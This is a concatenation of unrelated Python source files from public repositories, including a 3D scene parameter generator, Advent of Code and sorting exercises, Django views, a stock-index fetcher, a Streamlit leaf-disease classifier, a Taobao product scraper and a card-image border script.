raise ValueError(\n \"camera position should be a list of length 3, e.g., [0.0, -8.0, 3.6]\"\n )\n\n if len(camera_look_at) != 3:\n raise ValueError(\n \"camera look at should be a list of length 3, e.g., [0.0, 0.0, 0.5]\"\n )\n\n if len(floor_scale) != 3:\n raise ValueError(\n \"floor scale should be a list of length 3, e.g., [20.0, 40.0, 0.01]\"\n )\n\n if len(floor_position) != 3:\n raise ValueError(\n \"floor position should be a list of length 3, e.g., [0.0, 0.0, 0.0]\"\n )\n \n rng = np.random.default_rng()\n seeds = rng.choice(2147483647, size=num_scenes, replace=False)\n scenes = []\n \n for seed in seeds:\n latents = {}\n\n rng = np.random.RandomState(seed)\n latents[\"seed\"] = seed\n\n # set resolution\n latents[\"resolution\"] = resolution\n\n # set spawn region\n latents[\"spawn_region\"] = spawn_region\n\n # set sun position\n latents[\"sun_position\"] = sun_position\n latents[\"sun_position\"][0] = rng.uniform(-1, 1)\n latents[\"sun_position\"][1] = rng.uniform(-1, 1)\n\n # set camera position\n latents[\"camera_position\"] = camera_position\n\n # set camera look at\n latents[\"camera_look_at\"] = camera_look_at\n\n # set camera focal length\n latents[\"camera_focal_length\"] = camera_focal_length\n\n # set camera sensor width\n latents[\"camera_sensor_width\"] = camera_sensor_width\n\n # set floor scale\n latents[\"floor_scale\"] = floor_scale\n\n # set floor position\n latents[\"floor_position\"] = floor_position\n\n # set background type\n if background_type == \"artificial\":\n latents[\"bg_texture\"] = get_texture(\n rng.choice(TEXTURES), rng, True\n )\n elif background_type == \"realistic\":\n latents[\"bg_texture\"] = get_texture(\n \"IMAGE\", rng, True\n )\n else:\n raise ValueError(\n \"Invalid background type: background_type can be either 'artificial' or 'realistic'\"\n )\n\n # set the background material\n latents[\"bg_material\"] = get_material(rng)\n \n # set ambient illumination\n latents[\"ambient_illumination\"] = rng.uniform(0.4, 0.7)\n \n # object properties\n # number of objects in the scene \n # visibility and overlap depend on camera position and spawn region\n latents[\"num_objects\"] = rng.randint(min_num_objects, max_num_objects + 1)\n \n # choose #num_objects KuBasic shapes\n latents[\"object_shapes\"] = rng.choice(KUBASIC_IDS, size=latents[\"num_objects\"])\n \n # set #num_objects scales\n latents[\"object_scales\"] = rng.uniform(0.6, 1.2, size=latents[\"num_objects\"])\n \n # set #num_objects angles of rotation in (0, 2pi)\n latents[\"object_angles_of_rotation\"] = rng.uniform(0, 2*np.pi, size=latents[\"num_objects\"])\n \n # choose axes of rotation for the objects\n latents[\"object_axes_of_rotation\"] = rng.choice([\"x\", \"y\", \"z\"], size=latents[\"num_objects\"])\n \n # get object quaternions\n latents[\"object_quaternions\"] = [\n get_quaternion(\n latents[\"object_axes_of_rotation\"][k],\n latents[\"object_angles_of_rotation\"][k]\n ) for k in range(latents[\"num_objects\"])\n ]\n \n # set object textures\n latents[\"object_textures\"] = [\n get_texture(\n rng.choice(TEXTURES), \n rng, \n False\n ) for _ in range(latents[\"num_objects\"])\n ]\n \n # set object materials\n latents[\"object_materials\"] = [get_material(rng) for _ in range(latents[\"num_objects\"])]\n \n # append to dataset\n scenes.append(latents)\n\n return 
scenes","repo_name":"nkarantzas/renderstim","sub_path":"renderstim/latents/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27222179199","text":"import copy\nraw = list(el.strip() for el in open(\"input.txt\").readlines())\ncopy1, copy2 = [], []\ncount = [0 for i in range(len(raw[0]))]\ntotal = len(raw)\n\n\nfor el in raw:\n for i in range(len(el)):\n if el[i] == '0':\n pass\n else:\n count[i] += 1\n\ngamma, epsilon = 0, 0\n\nn = 0\nfor el in count[::-1]:\n if el >= len(raw) // 2:\n gamma += 2 ** n\n else:\n epsilon += 2 ** n\n n += 1\n\nprint(f\"{gamma * epsilon}\")\n\n\nfor el in raw:\n copy1.append(el)\n copy2.append(el)\n\nfor i in range(len(count)): count[i] = 0\n\nouter = len(raw[0])\n\nfor i in range(outer):\n if len(copy1) == 1:\n break\n for j in range(len(copy1)):\n if copy1[j][i] == '1':\n count[i] += 1\n \n if count[i] >= len(copy1) - count[i]:\n copy1 = list(filter(lambda s : s[i] == '1', copy1))\n else:\n copy1 = list(filter(lambda s : s[i] != '1', copy1))\n\nfor i in range(len(count)): count[i] = 0\n\nfor i in range(outer):\n if len(copy2) == 1:\n break\n for j in range(len(copy2)):\n if copy2[j][i] == '1':\n count[i] += 1\n \n if count[i] >= len(copy2) - count[i]:\n copy2 = list(filter(lambda s : s[i] == '0', copy2))\n else:\n copy2 = list(filter(lambda s : s[i] == '1', copy2))\n\n\no2 = int(f'0b{copy1[0]}', base=2)\nco2 = int(f'0b{copy2[0]}', base=2)\n\nprint(f\"{o2 * co2}\")","repo_name":"Vaascoo/AOC21","sub_path":"03/aoc3.py","file_name":"aoc3.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74320064409","text":"import copy\n\nfrom fiddle._src import config as config_lib\nfrom fiddle._src import mutate_buildable\n\n\ndef copy_with(\n buildable: config_lib.BuildableT, **kwargs\n) -> config_lib.BuildableT:\n \"\"\"Returns a shallow copy of ``buildable`` with updates to arguments.\n\n Args:\n buildable: A ``Buildable`` (e.g. a ``fdl.Config``) to copy and mutate.\n **kwargs: The arguments and values to assign.\n \"\"\"\n buildable = copy.copy(buildable)\n mutate_buildable.assign(buildable, **kwargs)\n return buildable\n\n\ndef deepcopy_with(buildable: config_lib.Buildable, **kwargs):\n \"\"\"Returns a deep copy of ``buildable`` with updates to arguments.\n\n Note: if any ``Config``'s inside ``buildable`` are shared with ``Config``'s\n outside of ``buildable``, then they will no longer be shared in the returned\n value. E.g., if ``cfg1.x.y is cfg2``, then\n ``fdl.deepcopy_with(cfg1, ...).x.y is cfg2`` will be ``False``.\n\n Args:\n buildable: A ``Buildable`` (e.g. 
a ``fdl.Config``) to copy and mutate.\n **kwargs: The arguments and values to assign.\n \"\"\"\n buildable = copy.deepcopy(buildable)\n mutate_buildable.assign(buildable, **kwargs)\n return buildable\n","repo_name":"google/fiddle","sub_path":"fiddle/_src/copying.py","file_name":"copying.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"31"} +{"seq_id":"74175535127","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.contrib.auth import authenticate\n\nfrom .forms import ContactForm\n\n\ndef home_page(request):\n context = {\n \"title\": \"Hello World!\",\n \"content\": \"Welcome to the homepage.\"\n }\n if request.user.is_authenticated():\n context[\"premium_content\"] = \"YEEEEEAAAAAHHH!\"\n return render(request, \"home.html\", context)\n\n\ndef about_page(request):\n context = {\n \"title\": \"About Page!\",\n \"content\": \"Welcome to the about page.\"\n }\n return render(request, \"home.html\", context)\n\n\ndef contact_page(request):\n contact_form = ContactForm(request.POST or None)\n context = {\n \"title\": \"Contact Page!\",\n \"content\": \"Welcome to the contact page.\",\n \"form\": contact_form\n }\n if contact_form.is_valid():\n print(contact_form.cleaned_data)\n # if request.method == \"POST\":\n # # print(request.POST)\n # print(request.POST.get('fullname'))\n # print(request.POST.get('email'))\n # print(request.POST.get('content'))\n return render(request, \"contact/view.html\", context)\n\n\n# def home_page_old(request):\n# return HttpResponse(\"Hello World\")\n","repo_name":"alejovp/django-ecommerce","sub_path":"src/ecommerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2552934496","text":"# Jugaad_data (Indian market live)\n# prettyTable to print data in tabular format\nfrom jugaad_data.nse import NSELive\nimport pandas as pd\n\n# colors\ngreen = \"\\033[1;32m%s\\033[0m\"\nred = \"\\033[1;31m%s\\033[0m\"\n\n# returns string in green\ndef positive_change(change):\n return green %str(change)[0:7]\n\n# returns string in red\ndef negative_change(change):\n return red %str(change)[0:7]\n\n\n# Initiate the connection\nn = NSELive()\n\n# Get the all the indices from the market\nall_indices = n.all_indices()['data']\n\ndf = pd.DataFrame(columns=['SYMBOL', 'OPEN', 'HIGH', 'LOW', 'CLOSE', 'CHANGE', 'ADVANCES', 'DECLINES', 'UNCHANGED'])\nfor index in all_indices:\n advances = index['advances'] if 'advances' in index else None\n declines = index['declines'] if 'declines' in index else None\n unchanged = index['unchanged'] if 'unchanged' in index else None\n\n if advances is None or declines is None or unchanged is None:\n continue\n\n change = index['last'] - index['open']\n new_record = pd.DataFrame([{'SYMBOL': index['indexSymbol'],\n 'OPEN': float(index['open']),\n 'HIGH': float(index['high']),\n 'LOW': float(index['low']),\n 'CLOSE': float(index['last']),\n 'CHANGE': float((str(change)[0:7])),\n 'ADVANCES': float(advances),\n 'DECLINES': float(declines),\n 'UNCHANGED': float(unchanged),\n }])\n\n df = pd.concat([df, new_record], ignore_index=True)\n\ndf = df.sort_values(by=['CHANGE'], ascending=False)\ndf.to_excel('indices.xlsx', sheet_name='indices', engine='openpyxl', 
index=False)\nprint(df.to_string())","repo_name":"hemanth-tr/NSEProject","sub_path":"indices_pandas.py","file_name":"indices_pandas.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"9144340942","text":"\nfrom Utility import InputLoader\n\ncount = []\n\nwith InputLoader(day=3) as reader:\n for line in reader:\n for i, char in enumerate(line):\n if len(count) <= i:\n count.append({\"0\": 0, \"1\": 0})\n count[i][char] += 1\n\ngamma_str = \"\".join(\"1\" if x[\"1\"] >= x[\"0\"] else \"0\" for x in count)\nepsilon_str = \"\".join(\"1\" if x[\"1\"] < x[\"0\"] else \"0\" for x in count)\n\ngamma = int(gamma_str, 2)\nepsilon = int(epsilon_str, 2)\n\nprint(f\"GAMMA = {gamma}, EPSILON = {epsilon}\")\nprint(f\"MULTIPLIED = {gamma * epsilon}\")\n","repo_name":"cgdilley/AdventOfCode2021","sub_path":"src/Day03/Day03.0.py","file_name":"Day03.0.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"}
{"seq_id":"69804494170","text":"import streamlit as st\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom PIL import Image\r\nmodel=tf.keras.models.load_model('potato-leaf-disease-detection/model.h5')\r\nclasses=['Potato Early blight', 'Potato Late blight', 'Potato healthy']\r\nst.title('Potato Leaf Disease Prediction')\r\n\r\n\r\n\r\ndef get_result(image):\r\n if image:\r\n st.image(image) # use the parameter; the global uploaded_img is undefined in the camera branch\r\n img=Image.open(image).resize((224,224))\r\n img_arr=np.array(img).reshape(1,224,224,3)\r\n\r\n prediction=model.predict(img_arr)\r\n st.write('Result')\r\n st.success(classes[np.argmax(prediction)])\r\n st.write('Accuracy')\r\n st.info(f\"{round(prediction.max(),2)*100}%\")\r\n\r\n\r\nselection=st.selectbox('Select Option',options=['Uploading Image','Using Camera'])\r\nif selection=='Uploading Image':\r\n st.write('You should upload image ')\r\n uploaded_img=st.file_uploader('Upload Here',type=['png','jpg','jpeg'])\r\n get_result(uploaded_img)\r\nelse:\r\n st.write('You should take a leaf picture') \r\n camera_img=st.camera_input('Take picture')\r\n get_result(camera_img)\r\n","repo_name":"shaxzoddavronov/portfolio","sub_path":"potato-leaf-disease-detection/potato_leaf_app.py","file_name":"potato_leaf_app.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"19604462345","text":"def perulangan():\n\n\tprint(\" \")\n\n\tmax=0\n\twhile True :\n\t\ta=int(input(\"Masukan Bilangan = \"))\n\t\tif max < a:\n\t\t\tmax = a\n\t\tif a==0:\n\n\t\t\tprint(\" \")\n\t\t\tprint(\"Bilangan Terbesar =\" ,max)\n\t\t\tprint(\" \")\n\t\t\tprint(\"Terimakasih Telah Menggunakan Program Ini\")\n\t\t\tprint(\" \")\n\t\t\tprint(\"DILARANG MENG COPY PROGRAM INI\")\n\t\t\tprint(\" \")\n\t\t\tjawab = \"ya\"\n\t\t\twhile jawab ==\"ya\":\n\t\t\t\tjawab =input(\"Ingin Mengulang Program Ini ? 
(ya/tidak)\")\n\t\t\t\tif jawab == \"ya\":\n\t\t\t\t\treturn perulangan()\n\t\t\t\telif jawab ==\"tidak\":\n\t\t\t\t\tbreak\n\t\t\t\tprint(\" \")\nperulangan()","repo_name":"uden28/lapyh03","sub_path":"latihan2.py","file_name":"latihan2.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13416098523","text":"'''\n上一个例子中成功尝试分析Ajax来抓取数据,但是并不是所有页面都可以分析Ajax来抓取,像淘宝虽然页面数据也是\n通过Ajax获取的,但是这些Ajax接口参数复杂,可能包含加密密钥等。这种页面,最快捷的抓取方法就是通过Selenium。\n\nReference: Python3 网络爬虫开发实战,Page 289\n'''\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom urllib.parse import quote\nfrom pyquery import PyQuery as pq\n\nbrowser=webdriver.Chrome()\n\nwait=WebDriverWait(browser, 10)\nKEYWORD='iPad'\n\ndef index_page(page):\n '''\n 抓取索引页\n :param page: 页码\n '''\n print('正在爬取第 ', page, '页')\n try:\n url='https://s.taobao.com/search?q=' + quote(KEYWORD)\n browser.get(url)\n if page > 1:\n input=wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '#mainsrp-pager div.form > input'))\n )\n submit=wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#mainsrp-pager div.form > \\\n span.btn.J_Submit')))\n input.clear()\n input.send_keys(page)\n submit.click()\n '''\n 以下两个wait只是用来等待网页加载完毕\n '''\n wait.until(\n EC.text_to_be_present_in_element((By.CSS_SELECTOR, '#mainsrp-pager li.item.active > span'), str(page))\n ) #判断span元素中是否存在指定的str(page)文本\n\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '.m-itemlist .items .item')))\n get_products()\n except TimeoutError:\n index_page(page)\n\n\ndef get_products():\n '''\n 提取商品数据\n '''\n html=browser.page_source\n doc=pq(html)\n items=doc('#mainsrp-itemlist .items .item').items()\n for item in items:\n product={\n 'image':item.find('.pic .img').attr('data-src'),\n 'price':item.find('.price').text(),\n 'deal':item.find('.deal-cnt').text(),\n 'title':item.find('.title').text(),\n 'shop':item.find('.shop').text(),\n 'location':item.find('.location').text()\n }\n print(product)\nindex_page(1)","repo_name":"vivver4/Python_Spider","sub_path":"Example_Demo/抓取淘宝商品.py","file_name":"抓取淘宝商品.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26879451679","text":"import os\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\n\r\ndef cornerLeftFill(xStart, xEnd, y):\r\n fillColor = pix[(xEnd + 1), y]\r\n for x in range(xEnd - xStart):\r\n try:\r\n pix[(xStart+x), y] = fillColor\r\n except Exception:\r\n pass\r\n\r\ndef cornerRightFill(xStart, xEnd, y):\r\n fillColor = pix[(xEnd - 1), y]\r\n for x in range(xStart - xEnd):\r\n try:\r\n pix[(xStart-x), y] = fillColor\r\n except Exception:\r\n pass\r\n\r\ndef CornerFill():\r\n TopCornerList = [35, 28, 23, 22, 19, 19, 15, 15, 13, 13, 11, 11, 9, 9, 7, 7, 7, 7, 5, 5, 5, 4, 3, 3, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2] #Gross, but works\r\n y = 0\r\n for x in TopCornerList:\r\n cornerLeftFill(0, x, y)\r\n y +=1\r\n\r\n y = 0\r\n for x in TopCornerList:\r\n newX = 750-x\r\n cornerRightFill(750, newX, y)\r\n y +=1\r\n\r\n y = 1000\r\n for x in range(46):\r\n cornerLeftFill(0, 32, y)\r\n y +=1\r\n\r\n y = 1000\r\n for x in range(46):\r\n newX = 750-33\r\n cornerRightFill(750, newX, y)\r\n y +=1\r\n\r\ndef boarderFill(): #Creation of extra boarder\r\n for y in range(1046):\r\n for x in 
range(750):\r\n fillColor = pix[x, y]\r\n newPix[x+33, y+32] = fillColor\r\n if y == 0:\r\n for b in range(32):\r\n newY = y+31-b\r\n newPix[x+33, newY] = fillColor\r\n elif y == 1045:\r\n for b in range(32):\r\n newY = y+33+b\r\n newPix[x+33, newY] = fillColor\r\n elif x == 0:\r\n for b in range(33):\r\n newX = x+32-b\r\n newPix[newX, y+32] = fillColor\r\n elif x == 749:\r\n for b in range(33):\r\n newX = x+34+b\r\n newPix[newX, y+32] = fillColor\r\n\r\n for y in range(33):\r\n for x in range(34):\r\n fillColor = newPix[34, y]\r\n newPix[x, y] = fillColor\r\n\r\n for y in range(33):\r\n for x in range(34):\r\n fillColor = newPix[781, y]\r\n newPix[815-x, y] = fillColor\r\n\r\n for y in range(33):\r\n for x in range(34):\r\n fillColor = newPix[34, 1109-y]\r\n newPix[x, 1109-y] = fillColor\r\n\r\n for y in range(33):\r\n for x in range(34):\r\n fillColor = newPix[782, 1109-y]\r\n newPix[815-x, 1109-y] = fillColor\r\n\r\ndef main(filename):\r\n global im, pix\r\n im = Image.open('images/'+filename)\r\n pix = im.load()\r\n\r\n CornerFill()\r\n\r\n global newImage, newPix\r\n newImage = Image.new('RGB', (816, 1110))\r\n newPix = newImage.load()\r\n\r\n boarderFill()\r\n\r\n newImage.save('images/' + filename)\r\n\r\ndef BSM(): #integration for main\r\n toFolder = os.listdir('images')\r\n for num in tqdm(range(len(toFolder)), desc='Creating boarders...'):\r\n main(toFolder[num])","repo_name":"Chadhendrixs/MtgProxyCreator","sub_path":"modules/cardBSM.py","file_name":"cardBSM.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"13676982876","text":"'''\n Problem: given N numbers, write a program that sorts them in ascending order.\n Input\n 1) first line - the count of numbers (1<=N<=1000)\n 2) from the second line - the numbers (integers with absolute value <= 1000), no duplicates\n\n Approaches\n 1) Selection sort - O(n²)\n 2) Bubble sort - O(n²)\n'''\n\nfrom sys import stdin\n\n# selection sort implementation (reconstructed: an extraction artifact had swallowed the span between the comparison operators)\ndef selection_sort(numList):\n print('Selection Sort : ',end='')\n for i in range(1, len(numList)):\n key = numList[i]\n j=i\n\n while j>0 and key < numList[j-1]:\n numList[j] = numList[j-1]\n j -= 1\n numList[j] = key\n\n print(numList)\n\n# bubble sort implementation (referenced by the docstring and by solution() below)\ndef bubble_sort(numList):\n print('Bubble Sort : ',end='')\n for i in range(len(numList)-1):\n for j in range(len(numList)-1-i):\n if numList[j] > numList[j+1]:\n numList[j], numList[j+1] = numList[j+1], numList[j]\n\n print(numList)\n\n\n\n\ndef solution():\n n = int(stdin.readline())\n numList = [0]*n\n\n for i in range(n):numList[i] = int(stdin.readline())\n\n # bubble_sort(numList)\n # selection_sort(numList)\n result = sorted(numList) # result was undefined; either helper above also sorts in place\n\n for n in result:\n print(n)\n\nsolution()","repo_name":"junseokseo-KR/pythonAlgorithm","sub_path":"venv/src/codeAlgorithm/baekjoon/정렬/2750_수정렬하기1.py","file_name":"2750_수정렬하기1.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
{"seq_id":"35375983457","text":"\"\"\"\nCombine all the results into a single table\n\"\"\"\nimport pandas as pd\nimport glob\nfrom os import path\n\n\nfiles = glob.glob(\"data/*-mask-chr*.csv\")\noutfile = 'data/densities-all.csv'\n\ndef load_file(fname):\n # was vcf generated before or after mask filter?\n bsn = path.basename(fname)\n mask = bsn.split('-')[0]\n dat = pd.read_csv(fname)\n dat['mask_filter'] = mask\n return dat\n\ndensities = [load_file(x) for x in files]\ndensities = pd.concat(densities)\ndensities.to_csv(outfile, index=False)\n","repo_name":"santiago1234/mxb-genomes","sub_path":"analysis-doc/210428-VisualizePositionOfVariants/collect-results.py","file_name":"collect-results.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"}
{"seq_id":"40185988683","text":"import asyncio\nimport 
aiohttp\nfrom fpl import FPL\nfrom app import db\nfrom models import Player\nfrom stats import get_player_positions\n\nid_to_team_name = {\n 1 : \"Arsenal\",\n 2 : \"Aston Villa\",\n 3 : \"Brighton\",\n 4 : \"Burnley\",\n 5 : \"Chelsea\",\n 6 : \"Crystal Palace\",\n 7 : \"Everton\",\n 8 : \"Fulham\",\n 9 : \"Leicester\",\n 10 : \"Leeds\",\n 11 : \"Liverpool\",\n 12 : \"Manchester City\",\n 13 : \"Manchester United\",\n 14 : \"Newcastle United\",\n 15 : \"Sheffield United\",\n 16 : \"Southampton\",\n 17 : \"Tottenham\",\n 18 : \"West Bromwich Albion\",\n 19 : \"West Ham\",\n 20 : \"Wolverhampton Wanderers\"\n}\n\nasync def main():\n async with aiohttp.ClientSession() as session:\n fpl = FPL(session)\n await get_player_positions(fpl)\n\n \n\n\nasyncio.run(main())","repo_name":"Jodldokus/fpl-radar","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29397673738","text":"import json\n\nfrom aiogram.types import Message\nfrom aiogram.types.reply_keyboard import ReplyKeyboardRemove\n\nfrom bot.handlers.default.donate import donate\nfrom bot.handlers.default.help import help\nfrom bot.handlers.default.reminders.new_reminder import new_reminder\nfrom bot.handlers.default.reminders.reminders_list import reminders_list\nfrom bot.handlers.default.referral import get_referral_link\nfrom bot.handlers.default.timers.timers_list import timer_menu\nfrom bot.keyboards.default.set_menu import set_menu\nfrom loader import dp, bot, _\n\n\n@dp.message_handler(commands=\"menu\")\nasync def menu(message: Message, user):\n settings = json.loads(user.settings)\n\n settings[\"kb_enabled\"] = True\n settings[\"last_kb\"] = \"main\"\n\n user.settings = json.dumps(settings)\n user.save()\n\n await message.answer(_(\"Выбери действие из меню 👇\"), reply_markup=set_menu(user))\n await message.delete()\n\n\n@dp.message_handler(commands=\"remove_menu\")\nasync def remove_menu(message: Message, user):\n settings = json.loads(user.settings)\n\n settings[\"kb_enabled\"] = False\n\n user.settings = json.dumps(settings)\n user.save()\n\n await message.answer(_(\"Клавиатура убрана. 
Вызвать ее можно командой /menu\"), reply_markup=set_menu(user))\n await message.delete()\n\n\n@dp.message_handler(text=\"➕ Новое напоминание\", state=\"*\")\n@dp.message_handler(text=\"➕ New reminder\", state=\"*\")\n@dp.message_handler(text=\"➕ Нове нагадування\", state=\"*\")\nasync def _new_reminder(message: Message, state, user):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await new_reminder(message, state, user)\n\n\n@dp.message_handler(text=\"📝 Список напоминаний\", state=\"*\")\n@dp.message_handler(text=\"📝 Reminder List\", state=\"*\")\n@dp.message_handler(text=\"📝 Список нагадувань\", state=\"*\")\nasync def _reminders_list(message: Message, user, state):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await reminders_list(message, user)\n\n\n@dp.message_handler(text=\"⏳ Таймер\", state=\"*\")\n@dp.message_handler(text=\"⏳ Timer\", state=\"*\")\n@dp.message_handler(text=\"⏳ Таймер\", state=\"*\")\nasync def _timer(message: Message, user, state):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await timer_menu(message, user)\n\n\n@dp.message_handler(text=\"💵 Донат\", state=\"*\")\n@dp.message_handler(text=\"💵 Donat\", state=\"*\")\nasync def _donate(message: Message, state):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await donate(message, state)\n\n\n@dp.message_handler(text=\"❔ Помощь по командам\", state=\"*\")\n@dp.message_handler(text=\"❔ Help by commands\", state=\"*\")\n@dp.message_handler(text=\"❔ Допомога по командам\", state=\"*\")\nasync def _help(message: Message, state, user):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await help(message, user)\n\n\n@dp.message_handler(text=\"🔗 Реферальная ссылка\", state=\"*\")\n@dp.message_handler(text=\"🔗 Referral link\", state=\"*\")\n@dp.message_handler(text=\"🔗 Реферальне посилання\", state=\"*\")\nasync def referral(message: Message, state, user):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await get_referral_link(message, user)\n\n\n@dp.message_handler(text=\"🛠 Админ-клавиатура\", state=\"*\")\n@dp.message_handler(text=\"🛠 Admin keyboard\", state=\"*\")\n@dp.message_handler(text=\"🛠 Адмін-клавіатура\", state=\"*\")\nasync def _reminders_list(message: Message, state, user):\n settings = json.loads(user.settings)\n\n settings[\"kb_enabled\"] = True\n settings[\"last_kb\"] = \"admin\"\n\n user.settings = json.dumps(settings)\n user.save()\n\n await message.answer(_(\"Выбери действие из меню 👇\"), reply_markup=set_menu(user))\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await 
state.finish()\n","repo_name":"RomanKuschanow/Lite_task_bot_aiogram","sub_path":"bot/handlers/default/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34629645816","text":"idade = 0\n\nwhile True:\n try:\n idade = int(input(\"Idade: \"))\n if(idade < 0 or idade > 150):\n print(\"Idade fora da faixa! (Deve ser entre 0 e 150 anos)\")\n continue\n\n break\n except ValueError:\n print(\"Idade inválida! Digite um número!!\")\n\n\nprint(idade)","repo_name":"JardelBrandon/Algoritmos_e_Programacao","sub_path":"Atividades/Roteiro 12 - Exceções - Exemplo/Programa exemplo/imprime_info.py","file_name":"imprime_info.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27191752609","text":"import os\nimport click\nfrom bvareader import reader\nfrom bvareader.exporter import save_csv\nfrom bvareader.preprocessing import prepare_position\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True), nargs=1)\n@click.option('-o', '--output', default='', help='name of the output files')\ndef process_bva_data(path, output):\n \"\"\"This script opens given path and outputs a preprocessed\n xml files including positions, measures, phases and sync times\"\"\"\n output_path = create_output_path(path, output)\n bva_prepare(path, output_path)\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.option('-o', '--output', default='', help='name of the output files')\ndef process_bva_positions(path, output):\n \"\"\"This script takes given bva xml file and outputs\n preprocessed csv files with positions\"\"\"\n output_path = create_output_path(path, output) + 'positions'\n\n pd_bva = reader.read_positions(path)\n pd_bva2 = prepare_position(pd_bva)\n\n save_csv(pd_bva, output_path + '_full.csv')\n save_csv(pd_bva2, output_path + '.csv')\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.option('-o', '--output', default='', help='name of the output files')\ndef process_bva_sync_times(path, output):\n \"\"\"This script takes given bva xml file and outputs\n preprocessed csv files with sync times\"\"\"\n output_path = create_output_path(path, output) + 'sync_times.csv'\n pd_sync = reader.read_sync_times(path)\n reader.save_csv(pd_sync, output_path)\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.option('-o', '--output', default='', help='name of the output files')\ndef process_bva_phases(path, output):\n \"\"\"This script takes given bva file and outputs\n preprocessed csv files with phases\"\"\"\n output_path = create_output_path(path, output) + 'phases.csv'\n pd_phases = reader.read_phases(path)\n save_csv(pd_phases, output_path)\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.option('-o', '--output', default='', help='name of the output files')\ndef process_bva_measure_start_stop(path, output):\n \"\"\"This script takes given bva xml file and outputs\n preprocessed csv files with measure starts and stops\"\"\"\n output_path = create_output_path(path, output) + 'measure_start_stop.csv'\n pd_start_stop = reader.read_new_measure_start_stop(path)\n save_csv(pd_start_stop, output_path)\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.option('-o', '--output', default='settings', help='name of the output 
files')\ndef xml_settings_to_csv(path, output):\n # TODO - issue with command with single instead of double quotes\n output_path = create_output_path(path, output) + 'settings.csv'\n pd_settings = reader.read_new_settings(path)\n save_csv(pd_settings, output_path)\n\n\ndef create_output_path(path, output):\n output_prefix = '' if output == '' else output + '_'\n output_path = os.path.dirname(os.path.realpath(path))\n return(os.path.join(output_path, output_prefix))\n\n\ndef bva_prepare(path, output_path):\n if reader.old_or_new(path) == 'new':\n try:\n pd_phases = reader.read_phases(path)\n save_csv(pd_phases, output_path + 'phases.csv')\n pd_start_stop = reader.read_new_measure_start_stop(path)\n save_csv(pd_start_stop, output_path + 'measure_start_stop.csv')\n except(Exception):\n print(\"Could not process start and stop due to non appropriate data\")\n pass\n if reader.old_or_new(path) == 'old':\n try:\n pd_keys = reader.read_keypresses(path)\n save_csv(pd_keys, output_path + 'keypresses.csv')\n pd_lasers = reader.read_lasers(path)\n save_csv(pd_lasers, output_path + 